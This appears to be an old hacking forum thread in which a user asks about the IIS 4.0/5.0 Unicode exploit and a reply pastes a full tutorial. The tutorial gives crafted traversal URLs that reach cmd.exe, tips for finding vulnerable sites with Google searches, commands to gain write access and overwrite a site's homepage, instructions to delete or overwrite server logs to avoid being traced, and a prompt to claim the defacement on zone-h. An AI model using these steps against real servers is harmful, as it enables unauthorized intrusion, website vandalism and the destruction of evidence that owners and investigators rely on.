hi there i started off with using IIS Unicode in IE, my question is does version 4 and 5 use the same unicode exploit or is there a different method and tool, cos IE is the only Tool i know of using. haha maybe am lazy or something

well if you can post any replys to this is always welcome

haha well seeing as no one going to reply but got about 39 views might as well delete this post

Thrillkill, check out neworder:
neworder.box.sk
it's in the recent articals somewhere down on the homepage "hacking iis a complete guide" or something like that. You should find the information you need there.

check out kotik for iis

there are some very good tutorials about unicode especially because it's an oldie. try google and you'll find more than you can imagine ;-)

here is a little something to get you started, other good tuts can be found on www.ebcvg.com

Exploiting IIS Unicode Vulnerbility by Mgrd


By Combining a few tutorials I've found on the net and by the great help I got from my friend TheGlitch, I'll be putting together this tutorial.

Well the first step anyone should take when attempting to exploit a server you should learn about it and learn what the exploit does.

What Unicode Is:

Microsoft Internet Information Server (IIS) versions 4.0 and 5.0 which usually runs on Windows NT4 and Windows 2k all have the Unicode extensions installed by default. Unicode allows characters that are not used in the English language to be recognized by Web Servers. The Unicode IIS Exploit allows users to run arbitrary commands on the target web servers. The Unicode extensions loaded on IIS Servers are known to be vulnerable unless they are running the current patches within the server.

Exploit Usage:

Basically the exploit is executed using HTTP protocol. This means that you open up your internet browser, put in the web directory, then a specially crafted Unicode, and some IIS commands. Don't worry if its confusing I explain this all later.

Example:

http://www.example.com/cgi-bin/.%252e/.%25.../c+dir+c:\

Time to break this down.

http://www.example.com  The vulnerable site running IIS 4.0 or 5.0 without a patched client. The best way to find an IIS site fire up www.google.com and search inurl:".asp" you're going to get a whole bunch of sites running IIS. To find out if the site is an IIS and what version it is. I suggest using a port scanner and scan for websource. My personal favorite for windows is Yet Another Port Scanner, or YAPS. For *nix its no doubt nmap, don't plan on using it if you aren't running a *nix OS on your computer, it needs root to run.

Cgi-bin  The web folder very important to the exploit. The main web folders where the exploit can be run from are: cgi-bin, msdac, _vti_cnf, scripts, and _vti_bin. These folders alone hold sensitive information, usually access to them is restricted to normal users.

.%252e/.%252e/.%252e/.%252e/.%252e/.%252e  This is the actual Unicode port of the attack. In the English language this is kinda like ./././ etc.

/winnt/system32/cmd.exe?  This is the most important part of the attack. For you windows NT users you should recognize this as your system files. This command allows you to execute the arbitrary code by talking to the DOS command line, nifty ain't it ;-).

C+dir+c:\  this is the dos commands. Its pretty much dir c:\ in IIS terminology. When we start the defacing process you will notice that c+command+text is the basic format of it.

Well now that we have finished going over the first part of the exploit and we broke it down lets move to start defacing.

Setup For the Defacing

We are going to need to find the web root to do anything to the site. It takes a lot of searching in most cases to find the root folder. One of the more common places to look for the web root is: C:\InetPub\wwwroot\, and D:\. For those who have built their own webpage, no not a free one, will have no trouble finding the homepage, these include index.html, index.htm, default.htm, and default.html. Once you find the homepage remember the location you will need it later.

In my travels I found this bit from a tutorial and decided to put it in because it is very important.

"Important Personal Note: From all the pages I have defaced using this Exploit this is what I have noticed even though you might have found the index.html it might not truly be the Index.html file reason being is because a lot of administrators create mock webroots. This is to prevent their web site from being hacked. But there is a way to beat this you will have to visit the web site and get the size of the web page itself. For those of you who don't know who to do that, all you do is right click and click on properties. Now all you do is match up the byte size to the one you have found and if it's the same size file it's the true Index.html if not keep searching to try and find the other one."

To make sure we have write access to the hard drives we have to do the following step. Replace whatever you have after cmd.exe?/ with c+copy+c:\winnt\system32\cmd.exe+c:\winnt\system32\cmd1.exe

Basically alls we did was copy cmd.exe to cmd1.exe, by doing this we confuse the system and it thinks we are the owner.

Replace cmd.exe?/ with cmd1.exe?/ and we are all set.

Now to test our privileges type c+echo+helow!+>+c:\test.txt after cmd1.exe?/

This commands creates a file named test.txt in the c:\root with the text helow! Saved to it.

If you get an access denied error then find another site to exploit.

Now we are ready to tag the site. Replace everything after cmd1.exe?/ with this.

C+echo+text+to+put+on+the+site+remember+no+html+>+c:\backup.htm

You can't use HTML to tag the site with Unicode so its just basic text. If you want to make your own templates and upload them to the site then I might suggest exploiting a server to get root access to it.

Now since we are about to deface I'm going to throw in another snippet that's very important.

"Important Note: Always remembers to clean the log files. Before even starting anything I would suggest loading a proxy server this would keep you protected but not untraceable. A proxy server will make it harder for you to be found but not impossible. So remember to always delete the log files or to over write them you can do this by executing the following command.

The default log file is located in c:\WINNIT\SYSTEM32\LOGFILES\ but I will almost guarantee they will not be there so now you ask yourself what can I do?

Well its simple all you will have to do is simply execute this command and it should display the log files for you the command is

Cmd1.exe?/c+dir+/S+c:\*in020716.log(change this to comply with your date, yymmdd) this command should almost defiantly find the server log files. I would recommend removing them completely but you might not be able to do this so I then would recommend echoing over them."

Now sense we got all this down I hope you know the risks, up to 2 years in jail if caught. Keep them cheeks tight .

Now for the last step to defacing the site.

A simple copy of backup.htm to the directory of the web root with the filename of the homepage.

The command is as follows:

c+copy+c:\backup.htm +c:\folder\to\webroot\homepage.html

Now go to the website, if your text is there, obviously the defacement worked. If not, you might have hit a decoy or (filtered) it up somehow go back over the steps, you'll figure it out ;-)

If it was a success then go to http://www.zone-h.org/en/defacements/notify and notify zone-h of the hack. It'll give ya some recognition :-D.

Thoughts Manifested 0wns ya'll. Greetz to ref0rm, TheGlitch, dr00t, and all of my fallen boys.

Contact:
IRC: EFnet mgrd

My Sources:
TheGlitch, C0ldPhaTe's tutorial on Unicode Exploiting, and ref0rms tip on the google asp trick to find an IIS site